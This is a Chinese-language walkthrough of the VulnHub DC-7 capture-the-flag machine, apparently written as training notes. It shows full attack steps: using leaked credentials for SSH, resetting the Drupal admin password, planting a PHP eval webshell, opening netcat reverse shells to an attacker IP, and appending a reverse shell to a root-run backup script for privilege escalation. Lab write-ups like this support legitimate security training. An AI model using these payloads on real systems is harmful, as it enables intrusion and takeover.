靶机地址
https://www.vulnhub.com/?q=dc-
打开靶机,设置为同一种nat模式
kali 信息收集主机发现
arp-scan -l
扫描目标端口发现开启80端口
访问目标网址,插件wappalyzer,查看到cms为Drupal 8
搜索@DC7USER,在stuff,中发现config.php文件存在账号密码
https://github.com/Dc7User/staffdb/blob/master/config.php
在web登录账号密码,发现无法登录,说明不是web端密码,尝试ssh登录成功
测试发现存在admin账户
查看/opt/scripts/backups.sh
进入/var/www/html,执行命令发现修改密码成功
drush user-password admin --password="123456"
登录admin账号,在extend,在install界面,上传文件
https://www.drupal.org/project/php/releases/8.x-1.x-dev
安装成功,点击激活模块,点击前面的三角将前几栏折回,找到PHP Filetr勾选并安装
安装完毕,点击content,add content,basic page,更改语言编写一句话木马,保存查看页面
<?php eval(@$_POST['bq']); ?>
保存:http://192.168.1.111/node/4
蚁剑连接
nc开启监听,反弹shell
蚁剑终端:nc -e /bin/sh 192.168.1.162 1234
nc -lvtp 1234
交互模式:python -c 'import pty;pty.spawn("/bin/bash")'
再次开启监听,将反弹shell 写入/opt/scripts/backups.sh脚本反弹shell,并执行
echo "nc -e /bin/bash 192.168.1.162 7894" >> /opt/scripts/backups.sh
进入/opt/scripts,执行backups.sh脚本,提权成功查看flag
参考链接
https://blog.youkuaiyun.com/qq_34028816/article/details/124572886